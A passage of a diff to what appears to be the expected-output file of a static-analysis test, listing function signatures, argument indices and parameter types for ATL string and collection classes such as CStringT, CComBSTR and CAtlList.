Add | 0 | +| atl.cpp:546:13:546:15 | Add | (const T &,BOOL) | CComSafeArray | Add | 1 | +| atl.cpp:612:5:612:10 | CPathT | (PCXSTR) | | operator+= | 0 | +| atl.cpp:612:5:612:10 | CPathT | (PCXSTR) | CSimpleStringT | operator+= | 0 | +| atl.cpp:612:5:612:10 | CPathT | (PCXSTR) | CStringT | operator= | 0 | +| atl.cpp:617:10:617:21 | AddExtension | (PCXSTR) | | operator+= | 0 | +| atl.cpp:617:10:617:21 | AddExtension | (PCXSTR) | CSimpleStringT | operator+= | 0 | +| atl.cpp:617:10:617:21 | AddExtension | (PCXSTR) | CStringT | operator= | 0 | +| atl.cpp:618:10:618:15 | Append | (PCXSTR) | | operator+= | 0 | +| atl.cpp:618:10:618:15 | Append | (PCXSTR) | CSimpleStringT | operator+= | 0 | +| atl.cpp:618:10:618:15 | Append | (PCXSTR) | CStringT | operator= | 0 | +| atl.cpp:621:10:621:16 | Combine | (PCXSTR,PCXSTR) | CStringT | Replace | 0 | +| atl.cpp:621:10:621:16 | Combine | (PCXSTR,PCXSTR) | CStringT | Replace | 1 | +| atl.cpp:621:10:621:16 | Combine | (const CStringT &,PCXSTR) | | operator+ | 1 | +| atl.cpp:621:10:621:16 | Combine | (int,PCXSTR) | CStringT | Insert | 1 | +| atl.cpp:622:24:622:35 | CommonPrefix | (PCXSTR) | | operator+= | 0 | +| atl.cpp:622:24:622:35 | CommonPrefix | (PCXSTR) | CSimpleStringT | operator+= | 0 | +| atl.cpp:622:24:622:35 | CommonPrefix | (PCXSTR) | CStringT | operator= | 0 | +| atl.cpp:659:25:659:34 | operator+= | (PCXSTR) | | operator+= | 0 | +| atl.cpp:659:25:659:34 | operator+= | (PCXSTR) | CSimpleStringT | operator+= | 0 | +| atl.cpp:659:25:659:34 | operator+= | (PCXSTR) | CStringT | operator= | 0 | +| atl.cpp:765:10:765:12 | Add | (const deque &,const Allocator &) | deque | deque | 1 | +| atl.cpp:765:10:765:12 | Add | (const forward_list &,const Allocator &) | forward_list | forward_list | 1 | +| atl.cpp:765:10:765:12 | Add | (const list &,const Allocator &) | list | list | 1 | +| atl.cpp:765:10:765:12 | Add | (const vector &,const Allocator &) | vector | vector | 1 | +| atl.cpp:765:10:765:12 | Add | (deque &&,const Allocator &) | deque | deque | 1 | +| atl.cpp:765:10:765:12 | Add | (forward_list &&,const Allocator &) | forward_list | forward_list | 1 | +| atl.cpp:765:10:765:12 | Add | (list &&,const Allocator &) | list | list | 1 | +| atl.cpp:765:10:765:12 | Add | (vector &&,const Allocator &) | vector | vector | 1 | +| atl.cpp:776:10:776:14 | SetAt | (const deque &,const Allocator &) | deque | deque | 1 | +| atl.cpp:776:10:776:14 | SetAt | (const forward_list &,const Allocator &) | forward_list | forward_list | 1 | +| atl.cpp:776:10:776:14 | SetAt | (const list &,const Allocator &) | list | list | 1 | +| atl.cpp:776:10:776:14 | SetAt | (const vector &,const Allocator &) | vector | vector | 1 | +| atl.cpp:776:10:776:14 | SetAt | (deque &&,const Allocator &) | deque | deque | 1 | +| atl.cpp:776:10:776:14 | SetAt | (forward_list &&,const Allocator &) | forward_list | forward_list | 1 | +| atl.cpp:776:10:776:14 | SetAt | (list &&,const Allocator &) | list | list | 1 | +| atl.cpp:776:10:776:14 | SetAt | (vector &&,const Allocator &) | vector | vector | 1 | +| atl.cpp:777:10:777:19 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | deque | deque | 2 | +| atl.cpp:777:10:777:19 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | forward_list | forward_list | 2 | +| atl.cpp:777:10:777:19 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | list | list | 2 | +| atl.cpp:777:10:777:19 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | vector | vector | 2 | +| atl.cpp:777:10:777:19 | SetAtIndex | (size_type,const T &,const Allocator &) | deque | deque | 1 | +| atl.cpp:777:10:777:19 | SetAtIndex | (size_type,const T &,const Allocator &) | deque | deque | 2 | +| atl.cpp:777:10:777:19 | SetAtIndex | (size_type,const T &,const Allocator &) | forward_list | forward_list | 1 | +| atl.cpp:777:10:777:19 | SetAtIndex | (size_type,const T &,const Allocator &) | forward_list | forward_list | 2 | +| atl.cpp:777:10:777:19 | SetAtIndex | (size_type,const T &,const Allocator &) | list | list | 1 | +| atl.cpp:777:10:777:19 | SetAtIndex | (size_type,const T &,const Allocator &) | list | list | 2 | +| atl.cpp:777:10:777:19 | SetAtIndex | (size_type,const T &,const Allocator &) | vector | vector | 1 | +| atl.cpp:777:10:777:19 | SetAtIndex | (size_type,const T &,const Allocator &) | vector | vector | 2 | +| atl.cpp:842:17:842:28 | SetExtraInfo | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:843:17:843:27 | SetHostName | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:844:17:844:27 | SetPassword | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:847:17:847:29 | SetSchemeName | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:848:17:848:26 | SetUrlPath | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:849:17:849:27 | SetUserName | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:915:5:915:18 | CSimpleStringT | (const XCHAR *,int,IAtlStringMgr *) | CSimpleStringT | CSimpleStringT | 0 | +| atl.cpp:915:5:915:18 | CSimpleStringT | (const XCHAR *,int,IAtlStringMgr *) | CSimpleStringT | CSimpleStringT | 1 | +| atl.cpp:915:5:915:18 | CSimpleStringT | (const XCHAR *,int,IAtlStringMgr *) | CSimpleStringT | CSimpleStringT | 2 | +| atl.cpp:915:5:915:18 | CSimpleStringT | (const YCHAR *,int,IAtlStringMgr *) | CStringT | CStringT | 1 | +| atl.cpp:915:5:915:18 | CSimpleStringT | (const YCHAR *,int,IAtlStringMgr *) | CStringT | CStringT | 2 | +| atl.cpp:916:5:916:18 | CSimpleStringT | (LPCSTR,IAtlStringMgr *) | CStringT | CStringT | 1 | +| atl.cpp:916:5:916:18 | CSimpleStringT | (LPCWSTR,IAtlStringMgr *) | CStringT | CStringT | 1 | +| atl.cpp:916:5:916:18 | CSimpleStringT | (PCXSTR,IAtlStringMgr *) | CSimpleStringT | CSimpleStringT | 0 | +| atl.cpp:916:5:916:18 | CSimpleStringT | (PCXSTR,IAtlStringMgr *) | CSimpleStringT | CSimpleStringT | 1 | +| atl.cpp:916:5:916:18 | CSimpleStringT | (const VARIANT &,IAtlStringMgr *) | CStringT | CStringT | 1 | +| atl.cpp:916:5:916:18 | CSimpleStringT | (const unsigned char *,IAtlStringMgr *) | CStringT | CStringT | 1 | +| atl.cpp:917:5:917:18 | CSimpleStringT | (const CSimpleStringT &) | | operator+= | 0 | +| atl.cpp:917:5:917:18 | CSimpleStringT | (const CSimpleStringT &) | CSimpleStringT | CSimpleStringT | 0 | +| atl.cpp:917:5:917:18 | CSimpleStringT | (const CSimpleStringT &) | CSimpleStringT | operator+= | 0 | +| atl.cpp:917:5:917:18 | CSimpleStringT | (const CSimpleStringT &) | CStringT | CStringT | 0 | +| atl.cpp:917:5:917:18 | CSimpleStringT | (const CSimpleStringT &) | CStringT | operator= | 0 | +| atl.cpp:921:10:921:15 | Append | (const CSimpleStringT &) | | operator+= | 0 | +| atl.cpp:921:10:921:15 | Append | (const CSimpleStringT &) | CSimpleStringT | CSimpleStringT | 0 | +| atl.cpp:921:10:921:15 | Append | (const CSimpleStringT &) | CSimpleStringT | operator+= | 0 | +| atl.cpp:921:10:921:15 | Append | (const CSimpleStringT &) | CStringT | CStringT | 0 | +| atl.cpp:921:10:921:15 | Append | (const CSimpleStringT &) | CStringT | operator= | 0 | +| atl.cpp:922:10:922:15 | Append | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| atl.cpp:922:10:922:15 | Append | (char,int) | CStringT | CStringT | 1 | +| atl.cpp:922:10:922:15 | Append | (const XCHAR *,int) | CStringT | CStringT | 1 | +| atl.cpp:922:10:922:15 | Append | (const YCHAR *,int) | CStringT | CStringT | 1 | +| atl.cpp:922:10:922:15 | Append | (wchar_t,int) | CStringT | CStringT | 1 | +| atl.cpp:923:10:923:15 | Append | (PCXSTR) | | operator+= | 0 | +| atl.cpp:923:10:923:15 | Append | (PCXSTR) | CSimpleStringT | operator+= | 0 | +| atl.cpp:923:10:923:15 | Append | (PCXSTR) | CStringT | operator= | 0 | +| atl.cpp:927:17:927:25 | CopyChars | (XCHAR *,const XCHAR *,int) | CSimpleStringT | CopyChars | 0 | +| atl.cpp:927:17:927:25 | CopyChars | (XCHAR *,const XCHAR *,int) | CSimpleStringT | CopyChars | 1 | +| atl.cpp:927:17:927:25 | CopyChars | (XCHAR *,const XCHAR *,int) | CSimpleStringT | CopyChars | 2 | +| atl.cpp:927:17:927:25 | CopyChars | (XCHAR *,const XCHAR *,int) | CSimpleStringT | CopyCharsOverlapped | 0 | +| atl.cpp:927:17:927:25 | CopyChars | (XCHAR *,const XCHAR *,int) | CSimpleStringT | CopyCharsOverlapped | 1 | +| atl.cpp:927:17:927:25 | CopyChars | (XCHAR *,const XCHAR *,int) | CSimpleStringT | CopyCharsOverlapped | 2 | +| atl.cpp:928:17:928:25 | CopyChars | (XCHAR *,size_t,const XCHAR *,int) | CSimpleStringT | CopyChars | 0 | +| atl.cpp:928:17:928:25 | CopyChars | (XCHAR *,size_t,const XCHAR *,int) | CSimpleStringT | CopyChars | 1 | +| atl.cpp:928:17:928:25 | CopyChars | (XCHAR *,size_t,const XCHAR *,int) | CSimpleStringT | CopyChars | 2 | +| atl.cpp:928:17:928:25 | CopyChars | (XCHAR *,size_t,const XCHAR *,int) | CSimpleStringT | CopyChars | 3 | +| atl.cpp:929:17:929:35 | CopyCharsOverlapped | (XCHAR *,const XCHAR *,int) | CSimpleStringT | CopyChars | 0 | +| atl.cpp:929:17:929:35 | CopyCharsOverlapped | (XCHAR *,const XCHAR *,int) | CSimpleStringT | CopyChars | 1 | +| atl.cpp:929:17:929:35 | CopyCharsOverlapped | (XCHAR *,const XCHAR *,int) | CSimpleStringT | CopyChars | 2 | +| atl.cpp:929:17:929:35 | CopyCharsOverlapped | (XCHAR *,const XCHAR *,int) | CSimpleStringT | CopyCharsOverlapped | 0 | +| atl.cpp:929:17:929:35 | CopyCharsOverlapped | (XCHAR *,const XCHAR *,int) | CSimpleStringT | CopyCharsOverlapped | 1 | +| atl.cpp:929:17:929:35 | CopyCharsOverlapped | (XCHAR *,const XCHAR *,int) | CSimpleStringT | CopyCharsOverlapped | 2 | +| atl.cpp:938:10:938:14 | SetAt | (XCHAR,XCHAR) | CStringT | Replace | 1 | +| atl.cpp:938:10:938:14 | SetAt | (const CStringT &,char) | | operator+ | 1 | +| atl.cpp:938:10:938:14 | SetAt | (int,XCHAR) | CStringT | Insert | 0 | +| atl.cpp:938:10:938:14 | SetAt | (int,XCHAR) | CStringT | Insert | 1 | +| atl.cpp:939:10:939:18 | SetString | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| atl.cpp:939:10:939:18 | SetString | (char,int) | CStringT | CStringT | 1 | +| atl.cpp:939:10:939:18 | SetString | (const XCHAR *,int) | CStringT | CStringT | 1 | +| atl.cpp:939:10:939:18 | SetString | (const YCHAR *,int) | CStringT | CStringT | 1 | +| atl.cpp:939:10:939:18 | SetString | (wchar_t,int) | CStringT | CStringT | 1 | +| atl.cpp:940:10:940:18 | SetString | (PCXSTR) | | operator+= | 0 | +| atl.cpp:940:10:940:18 | SetString | (PCXSTR) | CSimpleStringT | operator+= | 0 | +| atl.cpp:940:10:940:18 | SetString | (PCXSTR) | CStringT | operator= | 0 | +| atl.cpp:1036:5:1036:12 | CStringT | (const VARIANT &) | | operator+= | 0 | +| atl.cpp:1036:5:1036:12 | CStringT | (const VARIANT &) | CStringT | CStringT | 0 | +| atl.cpp:1036:5:1036:12 | CStringT | (const VARIANT &) | CStringT | operator= | 0 | +| atl.cpp:1037:5:1037:12 | CStringT | (LPCSTR,IAtlStringMgr *) | CStringT | CStringT | 1 | +| atl.cpp:1037:5:1037:12 | CStringT | (LPCWSTR,IAtlStringMgr *) | CStringT | CStringT | 1 | +| atl.cpp:1037:5:1037:12 | CStringT | (PCXSTR,IAtlStringMgr *) | CSimpleStringT | CSimpleStringT | 1 | +| atl.cpp:1037:5:1037:12 | CStringT | (const VARIANT &,IAtlStringMgr *) | CStringT | CStringT | 0 | +| atl.cpp:1037:5:1037:12 | CStringT | (const VARIANT &,IAtlStringMgr *) | CStringT | CStringT | 1 | +| atl.cpp:1037:5:1037:12 | CStringT | (const unsigned char *,IAtlStringMgr *) | CStringT | CStringT | 1 | +| atl.cpp:1038:5:1038:12 | CStringT | (const CStringT &) | CStringT | CStringT | 0 | +| atl.cpp:1038:5:1038:12 | CStringT | (const CStringT &) | CStringT | operator= | 0 | +| atl.cpp:1042:5:1042:12 | CStringT | (LPCSTR,IAtlStringMgr *) | CStringT | CStringT | 0 | +| atl.cpp:1042:5:1042:12 | CStringT | (LPCSTR,IAtlStringMgr *) | CStringT | CStringT | 1 | +| atl.cpp:1042:5:1042:12 | CStringT | (LPCWSTR,IAtlStringMgr *) | CStringT | CStringT | 1 | +| atl.cpp:1042:5:1042:12 | CStringT | (PCXSTR,IAtlStringMgr *) | CSimpleStringT | CSimpleStringT | 1 | +| atl.cpp:1042:5:1042:12 | CStringT | (const VARIANT &,IAtlStringMgr *) | CStringT | CStringT | 1 | +| atl.cpp:1042:5:1042:12 | CStringT | (const unsigned char *,IAtlStringMgr *) | CStringT | CStringT | 1 | +| atl.cpp:1043:5:1043:12 | CStringT | (LPCSTR,IAtlStringMgr *) | CStringT | CStringT | 1 | +| atl.cpp:1043:5:1043:12 | CStringT | (LPCWSTR,IAtlStringMgr *) | CStringT | CStringT | 0 | +| atl.cpp:1043:5:1043:12 | CStringT | (LPCWSTR,IAtlStringMgr *) | CStringT | CStringT | 1 | +| atl.cpp:1043:5:1043:12 | CStringT | (PCXSTR,IAtlStringMgr *) | CSimpleStringT | CSimpleStringT | 1 | +| atl.cpp:1043:5:1043:12 | CStringT | (const VARIANT &,IAtlStringMgr *) | CStringT | CStringT | 1 | +| atl.cpp:1043:5:1043:12 | CStringT | (const unsigned char *,IAtlStringMgr *) | CStringT | CStringT | 1 | +| atl.cpp:1045:5:1045:12 | CStringT | (char *) | CStringT | CStringT | 0 | +| atl.cpp:1046:5:1046:12 | CStringT | (unsigned char *) | CStringT | CStringT | 0 | +| atl.cpp:1047:5:1047:12 | CStringT | (wchar_t *) | CStringT | CStringT | 0 | +| atl.cpp:1049:5:1049:12 | CStringT | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| atl.cpp:1049:5:1049:12 | CStringT | (char,int) | CStringT | CStringT | 0 | +| atl.cpp:1049:5:1049:12 | CStringT | (char,int) | CStringT | CStringT | 1 | +| atl.cpp:1049:5:1049:12 | CStringT | (const XCHAR *,int) | CStringT | CStringT | 1 | +| atl.cpp:1049:5:1049:12 | CStringT | (const YCHAR *,int) | CStringT | CStringT | 1 | +| atl.cpp:1049:5:1049:12 | CStringT | (wchar_t,int) | CStringT | CStringT | 1 | +| atl.cpp:1050:5:1050:12 | CStringT | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| atl.cpp:1050:5:1050:12 | CStringT | (char,int) | CStringT | CStringT | 1 | +| atl.cpp:1050:5:1050:12 | CStringT | (const XCHAR *,int) | CStringT | CStringT | 1 | +| atl.cpp:1050:5:1050:12 | CStringT | (const YCHAR *,int) | CStringT | CStringT | 1 | +| atl.cpp:1050:5:1050:12 | CStringT | (wchar_t,int) | CStringT | CStringT | 0 | +| atl.cpp:1050:5:1050:12 | CStringT | (wchar_t,int) | CStringT | CStringT | 1 | +| atl.cpp:1061:10:1061:21 | AppendFormat | (PCXSTR,...) | CStringT | AppendFormat | 0 | +| atl.cpp:1061:10:1061:21 | AppendFormat | (PCXSTR,...) | CStringT | AppendFormat | 1 | +| atl.cpp:1061:10:1061:21 | AppendFormat | (PCXSTR,...) | CStringT | Format | 0 | +| atl.cpp:1061:10:1061:21 | AppendFormat | (PCXSTR,...) | CStringT | Format | 1 | +| atl.cpp:1061:10:1061:21 | AppendFormat | (PCXSTR,...) | CStringT | FormatMessage | 0 | +| atl.cpp:1061:10:1061:21 | AppendFormat | (PCXSTR,...) | CStringT | FormatMessage | 1 | +| atl.cpp:1061:10:1061:21 | AppendFormat | (UINT,...) | CStringT | AppendFormat | 1 | +| atl.cpp:1061:10:1061:21 | AppendFormat | (UINT,...) | CStringT | Format | 1 | +| atl.cpp:1061:10:1061:21 | AppendFormat | (UINT,...) | CStringT | FormatMessage | 1 | +| atl.cpp:1062:10:1062:21 | AppendFormat | (PCXSTR,...) | CStringT | AppendFormat | 1 | +| atl.cpp:1062:10:1062:21 | AppendFormat | (PCXSTR,...) | CStringT | Format | 1 | +| atl.cpp:1062:10:1062:21 | AppendFormat | (PCXSTR,...) | CStringT | FormatMessage | 1 | +| atl.cpp:1062:10:1062:21 | AppendFormat | (UINT,...) | CStringT | AppendFormat | 0 | +| atl.cpp:1062:10:1062:21 | AppendFormat | (UINT,...) | CStringT | AppendFormat | 1 | +| atl.cpp:1062:10:1062:21 | AppendFormat | (UINT,...) | CStringT | Format | 0 | +| atl.cpp:1062:10:1062:21 | AppendFormat | (UINT,...) | CStringT | Format | 1 | +| atl.cpp:1062:10:1062:21 | AppendFormat | (UINT,...) | CStringT | FormatMessage | 0 | +| atl.cpp:1062:10:1062:21 | AppendFormat | (UINT,...) | CStringT | FormatMessage | 1 | +| atl.cpp:1070:9:1070:14 | Insert | (PCXSTR,PCXSTR) | CStringT | Replace | 1 | +| atl.cpp:1070:9:1070:14 | Insert | (const CStringT &,PCXSTR) | | operator+ | 1 | +| atl.cpp:1070:9:1070:14 | Insert | (int,PCXSTR) | CStringT | Insert | 0 | +| atl.cpp:1070:9:1070:14 | Insert | (int,PCXSTR) | CStringT | Insert | 1 | +| atl.cpp:1071:9:1071:14 | Insert | (XCHAR,XCHAR) | CStringT | Replace | 1 | +| atl.cpp:1071:9:1071:14 | Insert | (int,XCHAR) | CStringT | Insert | 0 | +| atl.cpp:1071:9:1071:14 | Insert | (int,XCHAR) | CStringT | Insert | 1 | +| atl.cpp:1075:10:1075:19 | LoadString | (UINT) | CComBSTR | LoadString | 0 | +| atl.cpp:1075:10:1075:19 | LoadString | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:1079:14:1079:16 | Mid | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| atl.cpp:1079:14:1079:16 | Mid | (char,int) | CStringT | CStringT | 1 | +| atl.cpp:1079:14:1079:16 | Mid | (const XCHAR *,int) | CStringT | CStringT | 1 | +| atl.cpp:1079:14:1079:16 | Mid | (const YCHAR *,int) | CStringT | CStringT | 1 | +| atl.cpp:1079:14:1079:16 | Mid | (wchar_t,int) | CStringT | CStringT | 1 | +| atl.cpp:1081:9:1081:15 | Replace | (PCXSTR,PCXSTR) | CStringT | Replace | 0 | +| atl.cpp:1081:9:1081:15 | Replace | (PCXSTR,PCXSTR) | CStringT | Replace | 1 | +| atl.cpp:1081:9:1081:15 | Replace | (const CStringT &,PCXSTR) | | operator+ | 1 | +| atl.cpp:1081:9:1081:15 | Replace | (int,PCXSTR) | CStringT | Insert | 1 | +| atl.cpp:1082:9:1082:15 | Replace | (XCHAR,XCHAR) | CStringT | Replace | 0 | +| atl.cpp:1082:9:1082:15 | Replace | (XCHAR,XCHAR) | CStringT | Replace | 1 | +| atl.cpp:1082:9:1082:15 | Replace | (int,XCHAR) | CStringT | Insert | 1 | +| atl.cpp:1085:14:1085:26 | SpanExcluding | (PCXSTR) | | operator+= | 0 | +| atl.cpp:1085:14:1085:26 | SpanExcluding | (PCXSTR) | CSimpleStringT | operator+= | 0 | +| atl.cpp:1085:14:1085:26 | SpanExcluding | (PCXSTR) | CStringT | operator= | 0 | +| atl.cpp:1086:14:1086:26 | SpanIncluding | (PCXSTR) | | operator+= | 0 | +| atl.cpp:1086:14:1086:26 | SpanIncluding | (PCXSTR) | CSimpleStringT | operator+= | 0 | +| atl.cpp:1086:14:1086:26 | SpanIncluding | (PCXSTR) | CStringT | operator= | 0 | +| atl.cpp:1088:15:1088:18 | Trim | (XCHAR) | CStringT | operator= | 0 | +| atl.cpp:1089:15:1089:18 | Trim | (PCXSTR) | | operator+= | 0 | +| atl.cpp:1089:15:1089:18 | Trim | (PCXSTR) | CSimpleStringT | operator+= | 0 | +| atl.cpp:1089:15:1089:18 | Trim | (PCXSTR) | CStringT | operator= | 0 | +| atl.cpp:1091:15:1091:22 | TrimLeft | (XCHAR) | CStringT | operator= | 0 | +| atl.cpp:1092:15:1092:22 | TrimLeft | (PCXSTR) | | operator+= | 0 | +| atl.cpp:1092:15:1092:22 | TrimLeft | (PCXSTR) | CSimpleStringT | operator+= | 0 | +| atl.cpp:1092:15:1092:22 | TrimLeft | (PCXSTR) | CStringT | operator= | 0 | +| atl.cpp:1094:15:1094:23 | TrimRight | (XCHAR) | CStringT | operator= | 0 | +| atl.cpp:1095:15:1095:23 | TrimRight | (PCXSTR) | | operator+= | 0 | +| atl.cpp:1095:15:1095:23 | TrimRight | (PCXSTR) | CSimpleStringT | operator+= | 0 | +| atl.cpp:1095:15:1095:23 | TrimRight | (PCXSTR) | CStringT | operator= | 0 | | constructor_delegation.cpp:10:2:10:8 | MyValue | (LPCOLESTR,int) | CComBSTR | Append | 1 | | constructor_delegation.cpp:10:2:10:8 | MyValue | (char,int) | CStringT | CStringT | 1 | | constructor_delegation.cpp:10:2:10:8 | MyValue | (const XCHAR *,int) | CStringT | CStringT | 1 | @@ -907,313 +907,313 @@ getParameterTypeName | atl.cpp:4:8:4:11 | sink | 0 | ... | | atl.cpp:29:8:29:8 | operator= | 0 | __POSITION && | | atl.cpp:29:8:29:8 | operator= | 0 | const __POSITION & | -| atl.cpp:51:16:51:16 | operator= | 0 | const tagSAFEARRAYBOUND & | -| atl.cpp:51:16:51:16 | operator= | 0 | tagSAFEARRAYBOUND && | -| atl.cpp:56:16:56:16 | operator= | 0 | const tagVARIANT & | -| atl.cpp:56:16:56:16 | operator= | 0 | tagVARIANT && | -| atl.cpp:60:16:60:16 | operator= | 0 | const tagSAFEARRAY & | -| atl.cpp:60:16:60:16 | operator= | 0 | tagSAFEARRAY && | -| atl.cpp:69:8:69:8 | _U_STRINGorID | 0 | _U_STRINGorID && | -| atl.cpp:69:8:69:8 | _U_STRINGorID | 0 | const _U_STRINGorID & | -| atl.cpp:69:8:69:8 | operator= | 0 | _U_STRINGorID && | -| atl.cpp:69:8:69:8 | operator= | 0 | const _U_STRINGorID & | -| atl.cpp:70:3:70:15 | _U_STRINGorID | 0 | UINT | -| atl.cpp:70:3:70:15 | _U_STRINGorID | 0 | unsigned int | -| atl.cpp:71:3:71:15 | _U_STRINGorID | 0 | LPCTSTR | -| atl.cpp:71:3:71:15 | _U_STRINGorID | 0 | const char * | -| atl.cpp:195:10:195:12 | Add | 0 | INARGTYPclass:0 | -| atl.cpp:197:10:197:15 | Append | 0 | const CAtlArray & | -| atl.cpp:198:8:198:11 | Copy | 0 | const CAtlArray & | -| atl.cpp:200:6:200:10 | GetAt | 0 | size_t | -| atl.cpp:204:8:204:20 | InsertArrayAt | 0 | size_t | -| atl.cpp:204:8:204:20 | InsertArrayAt | 1 | const CAtlArray * | -| atl.cpp:205:8:205:15 | InsertAt | 0 | size_t | -| atl.cpp:205:8:205:15 | InsertAt | 1 | INARGTYPclass:0 | -| atl.cpp:205:8:205:15 | InsertAt | 2 | size_t | -| atl.cpp:210:8:210:16 | SetAtGrow | 0 | size_t | -| atl.cpp:210:8:210:16 | SetAtGrow | 1 | INARGTYPclass:0 | -| atl.cpp:212:6:212:15 | operator[] | 0 | size_t | -| atl.cpp:258:3:258:10 | CAtlList | 0 | UINT | -| atl.cpp:258:3:258:10 | CAtlList | 0 | UINT | -| atl.cpp:258:3:258:10 | CAtlList | 0 | unsigned int | -| atl.cpp:258:3:258:10 | CAtlList | 0 | unsigned int | -| atl.cpp:261:12:261:18 | AddHead | 0 | INARGTYPclass:0 | -| atl.cpp:261:12:261:18 | AddHead | 0 | INARGTYPclass:0 | -| atl.cpp:262:8:262:18 | AddHeadList | 0 | const CAtlList * | -| atl.cpp:262:8:262:18 | AddHeadList | 0 | const CAtlList * | -| atl.cpp:264:12:264:18 | AddTail | 0 | INARGTYPclass:0 | -| atl.cpp:264:12:264:18 | AddTail | 0 | INARGTYPclass:0 | -| atl.cpp:265:8:265:18 | AddTailList | 0 | const CAtlList * | -| atl.cpp:265:8:265:18 | AddTailList | 0 | const CAtlList * | -| atl.cpp:266:12:266:15 | Find | 0 | INARGTYPclass:0 | -| atl.cpp:266:12:266:15 | Find | 0 | INARGTYPclass:0 | -| atl.cpp:266:12:266:15 | Find | 1 | POSITION | -| atl.cpp:266:12:266:15 | Find | 1 | POSITION | -| atl.cpp:266:12:266:15 | Find | 1 | __POSITION * | -| atl.cpp:266:12:266:15 | Find | 1 | __POSITION * | -| atl.cpp:267:12:267:20 | FindIndex | 0 | size_t | -| atl.cpp:267:12:267:20 | FindIndex | 0 | size_t | -| atl.cpp:268:6:268:10 | GetAt | 0 | POSITION | -| atl.cpp:268:6:268:10 | GetAt | 0 | POSITION | -| atl.cpp:268:6:268:10 | GetAt | 0 | __POSITION * | -| atl.cpp:268:6:268:10 | GetAt | 0 | __POSITION * | -| atl.cpp:281:12:281:22 | InsertAfter | 0 | POSITION | -| atl.cpp:281:12:281:22 | InsertAfter | 0 | POSITION | -| atl.cpp:281:12:281:22 | InsertAfter | 0 | __POSITION * | -| atl.cpp:281:12:281:22 | InsertAfter | 0 | __POSITION * | -| atl.cpp:281:12:281:22 | InsertAfter | 1 | INARGTYPclass:0 | -| atl.cpp:281:12:281:22 | InsertAfter | 1 | INARGTYPclass:0 | -| atl.cpp:282:12:282:23 | InsertBefore | 0 | POSITION | -| atl.cpp:282:12:282:23 | InsertBefore | 0 | POSITION | -| atl.cpp:282:12:282:23 | InsertBefore | 0 | __POSITION * | -| atl.cpp:282:12:282:23 | InsertBefore | 0 | __POSITION * | -| atl.cpp:282:12:282:23 | InsertBefore | 1 | INARGTYPclass:0 | -| atl.cpp:282:12:282:23 | InsertBefore | 1 | INARGTYPclass:0 | -| atl.cpp:292:8:292:12 | SetAt | 0 | POSITION | -| atl.cpp:292:8:292:12 | SetAt | 0 | POSITION | -| atl.cpp:292:8:292:12 | SetAt | 0 | __POSITION * | -| atl.cpp:292:8:292:12 | SetAt | 0 | __POSITION * | -| atl.cpp:292:8:292:12 | SetAt | 1 | INARGTYPclass:0 | -| atl.cpp:292:8:292:12 | SetAt | 1 | INARGTYPclass:0 | -| atl.cpp:402:8:402:8 | operator= | 0 | IUnknown && | -| atl.cpp:402:8:402:8 | operator= | 0 | const IUnknown & | -| atl.cpp:404:8:404:8 | operator= | 0 | ISequentialStream && | -| atl.cpp:404:8:404:8 | operator= | 0 | const ISequentialStream & | -| atl.cpp:406:8:406:8 | operator= | 0 | IStream && | -| atl.cpp:406:8:406:8 | operator= | 0 | const IStream & | -| atl.cpp:408:8:408:8 | operator= | 0 | const CComBSTR & | -| atl.cpp:410:3:410:10 | CComBSTR | 0 | const CComBSTR & | -| atl.cpp:411:3:411:10 | CComBSTR | 0 | int | -| atl.cpp:412:3:412:10 | CComBSTR | 0 | int | -| atl.cpp:412:3:412:10 | CComBSTR | 1 | LPCOLESTR | -| atl.cpp:412:3:412:10 | CComBSTR | 1 | const wchar_t * | -| atl.cpp:413:3:413:10 | CComBSTR | 0 | int | -| atl.cpp:413:3:413:10 | CComBSTR | 1 | LPCSTR | -| atl.cpp:413:3:413:10 | CComBSTR | 1 | const char * | -| atl.cpp:414:3:414:10 | CComBSTR | 0 | LPCOLESTR | -| atl.cpp:414:3:414:10 | CComBSTR | 0 | const wchar_t * | -| atl.cpp:415:3:415:10 | CComBSTR | 0 | LPCSTR | -| atl.cpp:415:3:415:10 | CComBSTR | 0 | const char * | -| atl.cpp:416:3:416:10 | CComBSTR | 0 | CComBSTR && | -| atl.cpp:419:11:419:16 | Append | 0 | const CComBSTR & | -| atl.cpp:420:11:420:16 | Append | 0 | wchar_t | -| atl.cpp:421:11:421:16 | Append | 0 | char | -| atl.cpp:422:11:422:16 | Append | 0 | LPCOLESTR | -| atl.cpp:422:11:422:16 | Append | 0 | const wchar_t * | -| atl.cpp:423:11:423:16 | Append | 0 | LPCSTR | -| atl.cpp:423:11:423:16 | Append | 0 | const char * | -| atl.cpp:424:11:424:16 | Append | 0 | LPCOLESTR | -| atl.cpp:424:11:424:16 | Append | 0 | const wchar_t * | -| atl.cpp:424:11:424:16 | Append | 1 | int | -| atl.cpp:425:11:425:20 | AppendBSTR | 0 | BSTR | -| atl.cpp:425:11:425:20 | AppendBSTR | 0 | wchar_t * | -| atl.cpp:426:11:426:21 | AppendBytes | 0 | const char * | -| atl.cpp:426:11:426:21 | AppendBytes | 1 | int | -| atl.cpp:427:11:427:21 | ArrayToBSTR | 0 | const SAFEARRAY * | -| atl.cpp:427:11:427:21 | ArrayToBSTR | 0 | const tagSAFEARRAY * | -| atl.cpp:428:11:428:20 | AssignBSTR | 0 | const BSTR | -| atl.cpp:428:11:428:20 | AssignBSTR | 0 | const wchar_t * | -| atl.cpp:429:8:429:13 | Attach | 0 | BSTR | -| atl.cpp:429:8:429:13 | Attach | 0 | wchar_t * | -| atl.cpp:430:11:430:21 | BSTRToArray | 0 | LPSAFEARRAY * | -| atl.cpp:430:11:430:21 